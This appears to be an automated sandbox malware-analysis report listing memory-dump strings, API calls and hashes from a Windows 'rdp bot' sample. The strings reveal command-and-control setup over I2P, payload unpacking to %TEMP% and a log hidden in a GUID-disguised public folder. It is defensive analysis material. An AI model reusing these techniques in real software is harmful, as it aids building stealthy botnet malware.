                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                                                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                                                  • API String ID: 1980715187-354652506
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                                                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                                                  • API String ID: 1980715187-354652506
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                                                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                                                  • API String ID: 1980715187-354652506
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158508770.00007FF8BFB31000.00000020.00000001.01000000.0000000B.sdmp, Offset: 00007FF8BFB30000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb30000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                                                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                                                  • API String ID: 1980715187-354652506
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: OpenQueryValuefflushfwrite
                                                                                                                                                  • String ID: $ $(key != NULL)$(root != NULL)$(value != NULL)$(value_sz != NULL)$H:/Projects/rdp/bot/codebase/registry.c$NULL$P$P$[D] (%s) -> Done(root=0x%p,key=%s,param=%s)$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(root=0x%p,key=%s,param=%s,err=%08x)$[E] (%s) -> RegOpenKeyA failed(root=0x%p,key=%s,res=%lu)$[E] (%s) -> RegQueryValueA failed(root=0x%p,key=%s,param=%s,res=%lu)$registry_get_value
                                                                                                                                                  • API String ID: 1980715187-354652506
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: CreateErrorLastThread
                                                                                                                                                  • String ID: $Done$P$[E] (%s) -> CreateThread(%s) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[I] (%s) -> %s$[I] (%s) -> CreateThread(%s) done$cnc_init$cnccli$i2p_addr$i2p_sam3_timeo$i2p_try_num$routine_rx$server_host$server_port$server_timeo$~
                                                                                                                                                  • API String ID: 1689873465-2891999747
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: _errno$fclosefopenfwrite
                                                                                                                                                  • String ID: (mode != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Failed(path=%s,mode=%s,err=%08x)$[E] (%s) -> fopen failed(path=%s,mode=%s,errno=%d)$[E] (%s) -> fwrite failed(path=%s,mode=%s,errno=%d)$[I] (%s) -> Done(path=%s,mode=%s,buf_sz=%llu)$fs_file_write
                                                                                                                                                  • API String ID: 608220805-961576452
                                                                                                                                                  • Opcode ID: 1cb5eafd62267dfe483e8b9f6ab85db23e0a2ddce2e864eb0c2ab42da6a02e53
                                                                                                                                                  • Instruction ID: 2b372f662e107978dcc3a3b77d81683085512e4e524a60828b9d0055f14cf8a9
                                                                                                                                                  • Opcode Fuzzy Hash: 1cb5eafd62267dfe483e8b9f6ab85db23e0a2ddce2e864eb0c2ab42da6a02e53
                                                                                                                                                  • Instruction Fuzzy Hash: C0517C61A0964791FA209B5DEA00AB82371BFB8794F580133FB4E97294DE3CF9668301
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                                                                                                                                  • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                                                                                                                                  • API String ID: 1104438493-906809513
                                                                                                                                                  • Opcode ID: bb568f17dd6a2e4523c81be14fcf721ce6dfccabb5d46468dc8857a08ea5cd7d
                                                                                                                                                  • Instruction ID: ab90251c725329c0c9ac5a2c3904effeaf8403c1050bee2b4bc8ccf9e426c462
                                                                                                                                                  • Opcode Fuzzy Hash: bb568f17dd6a2e4523c81be14fcf721ce6dfccabb5d46468dc8857a08ea5cd7d
                                                                                                                                                  • Instruction Fuzzy Hash: 2171CF71B0C28382FB209B4CE8C07B91250AF857D8F6569B2DF4F576A5DE2EF9498301
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158853612.00007FF8BFB80000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158903693.00007FF8BFB93000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158925698.00007FF8BFB94000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158951148.00007FF8BFB9D000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158971118.00007FF8BFBA0000.00000004.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158989337.00007FF8BFBA1000.00000008.00000001.01000000.00000009.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3159008273.00007FF8BFBA4000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                                                                                                                                  • String ID: (path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                                                                                                                                  • API String ID: 1104438493-906809513
                                                                                                                                                  • Opcode ID: 06752aa5a4281953a201f9da300dc2996c40b0526a77fcdae041027a90c7b52c
                                                                                                                                                  • Instruction ID: bc6e1a3ffb38801d94d25b8a651edbd589e382edbf2a1d18a8aa8eb8d96eef26
                                                                                                                                                  • Opcode Fuzzy Hash: 06752aa5a4281953a201f9da300dc2996c40b0526a77fcdae041027a90c7b52c
                                                                                                                                                  • Instruction Fuzzy Hash: 94717C12F0C64382FA605B9CE884BB92351AFD47E4F556136DB4E47A97FE2CA845CB01
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpin_mbscatfopen
                                                                                                                                                  • String ID: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$main.log$service
                                                                                                                                                  • API String ID: 3216678114-1460613360
                                                                                                                                                  • Opcode ID: 6f494a988963525dfc8c9e6694f7ed676b47cce2b4ff5cefa6908507d4734c9b
                                                                                                                                                  • Instruction ID: 9ef994839c132b5c9fa6b1b769b687498c06fe93de125967b3130e4475d8b35b
                                                                                                                                                  • Opcode Fuzzy Hash: 6f494a988963525dfc8c9e6694f7ed676b47cce2b4ff5cefa6908507d4734c9b
                                                                                                                                                  • Instruction Fuzzy Hash: F2514950E1C60381FA31A71DEA91BB932A1EF78744F940133F74DC62AADE6CA876C351
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$_errno_mbscpy$_mbscatfopenfseek
                                                                                                                                                  • String ID: %TEMP%$(package != NULL)$(target != NULL)$H:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x)$[E] (%s) -> Failed(package=%s,target=%s,err=%08x)$[I] (%s) -> Done(package=%s,target=%s)$[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u)$package_unpack
                                                                                                                                                  • API String ID: 3066828623-625159688
                                                                                                                                                  • Opcode ID: 105523515e84c8d438c400628abfd7f6ba265d1413e23efcc273f54c6047ae63
                                                                                                                                                  • Instruction ID: 26bb098007f155212ce2f514bd9cdccf8e1a4530e59d955e4d8acabd3a7d78d4
                                                                                                                                                  • Opcode Fuzzy Hash: 105523515e84c8d438c400628abfd7f6ba265d1413e23efcc273f54c6047ae63
                                                                                                                                                  • Instruction Fuzzy Hash: 0C818061A0C74795FB209B19E8407AA6371FBAC784F885232FB4DD7685EE7CE519C700
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: strlen$Heap_mbscpy$AllocFreeHandleLibraryModuleProcess
                                                                                                                                                  • String ID: [E] (%s) -> Failed(name=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(name=%s)$[I] (%s) -> Loaded(f_path=%s)$mem_alloc$unit_cleanup$unit_init$units_init
                                                                                                                                                  • API String ID: 548194777-214984806
                                                                                                                                                  • Opcode ID: d97ec5c473da84a818b1d6212fb4ba4403f3e876dd0ce6e9996ee0095170d0c4
                                                                                                                                                  • Instruction ID: 7b14420791e784e2a0539c6a89df1eb65fdb26da714f038924d8f7603966f7ca
                                                                                                                                                  • Opcode Fuzzy Hash: d97ec5c473da84a818b1d6212fb4ba4403f3e876dd0ce6e9996ee0095170d0c4
                                                                                                                                                  • Instruction Fuzzy Hash: 39815A61A0C64391FA719B09A951BBA23A1EFB8B84F444472FB4D877D5EF3CE526C310
                                                                                                                                                  APIs
                                                                                                                                                  • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,service,000002234F5413D0,?,00007FF6BE0484F0,00007FF6BE0384E9), ref: 00007FF6BE033DD9
                                                                                                                                                  • LockFileEx.KERNEL32(?,?,?,?,?,?,?,?,?,service,000002234F5413D0,?,00007FF6BE0484F0,00007FF6BE0384E9), ref: 00007FF6BE033E12
                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,000002234F5413D0,?,00007FF6BE0484F0,00007FF6BE0384E9), ref: 00007FF6BE033EE7
                                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,000002234F5413D0,?,00007FF6BE0484F0,00007FF6BE0384E9), ref: 00007FF6BE033FCC
                                                                                                                                                  • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,service,000002234F5413D0,?,00007FF6BE0484F0,00007FF6BE0384E9), ref: 00007FF6BE034140
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3157217941.00007FF6BE031000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF6BE030000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3157196943.00007FF6BE030000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157241417.00007FF6BE040000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE048000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157265205.00007FF6BE04A000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3157305607.00007FF6BE04E000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff6be030000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorFileLast$CloseCreateHandleLock
                                                                                                                                                  • String ID: (lock != NULL)$(path != NULL)$H:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$service
                                                                                                                                                  • API String ID: 2747014929-3958755462
                                                                                                                                                  • Opcode ID: 54ee31f5105c176933aa956faabb0ff0d66d276a4c84ab9d9d605d99f51c3a37
                                                                                                                                                  • Instruction ID: 9af39ffbe08a6649e6bebd5fb05859f29a298f741062ad6de40742c1479404f1
                                                                                                                                                  • Opcode Fuzzy Hash: 54ee31f5105c176933aa956faabb0ff0d66d276a4c84ab9d9d605d99f51c3a37
                                                                                                                                                  • Instruction Fuzzy Hash: BA816E20E0C74B81F630AB5CA580B7972709F78355E141633EB7ECB6D5EE2DA9A58302
                                                                                                                                                  APIs
                                                                                                                                                  Strings
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  • Associated: 00000016.00000002.3158349155.00007FF8BA4F0000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158397760.00007FF8BA503000.00000002.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158419752.00007FF8BA50C000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158442871.00007FF8BA50F000.00000004.00000001.01000000.0000000D.sdmp
                                                                                                                                                  • Associated: 00000016.00000002.3158466331.00007FF8BA510000.00000008.00000001.01000000.0000000D.sdmp
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                                                                                                  • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                                                                                                  • API String ID: 3154682637-708158336
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                                                                                                  • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                                                                                                  • API String ID: 3154682637-708158336
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                                                                                                  • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                                                                                                  • API String ID: 3154682637-708158336
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158634294.00007FF8BFB51000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8BFB50000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb50000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                                                                                                  • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                                                                                                  • API String ID: 3154682637-708158336
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158876338.00007FF8BFB81000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8BFB80000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8bfb80000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                                                                                                                                  • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                                                                                                                                  • API String ID: 3154682637-708158336
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158369804.00007FF8BA4F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FF8BA4F0000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8ba4f0000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                                                                                                                  • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                                                                                                                  • API String ID: 1412730629-3633878399
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158112398.00007FF8B9151000.00000020.00000001.01000000.0000000F.sdmp, Offset: 00007FF8B9150000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9150000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                                                                                                                  • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                                                                                                                  • API String ID: 1412730629-3633878399
                                                                                                                                                  Memory Dump Source
                                                                                                                                                  • Source File: 00000016.00000002.3158250572.00007FF8B9181000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FF8B9180000, based on PE: true
                                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                                  • Snapshot File: hcaresult_22_2_7ff8b9180000_main.jbxd
                                                                                                                                                  Similarity
                                                                                                                                                  • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                                                                                                                                  • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                                                                                                                                  • API String ID: 1412730629-3633878399
                                                                                                                                                  • Opcode ID: 6b8a36cc971b699367ac3bf5157fbd41f4ace45a84db308636fec646c69488e6
                                                                                                                                                  • Instruction ID: 3df02d1f11550c651cfb7ddace372933f4cea60f761bd2cd95179f2619654079
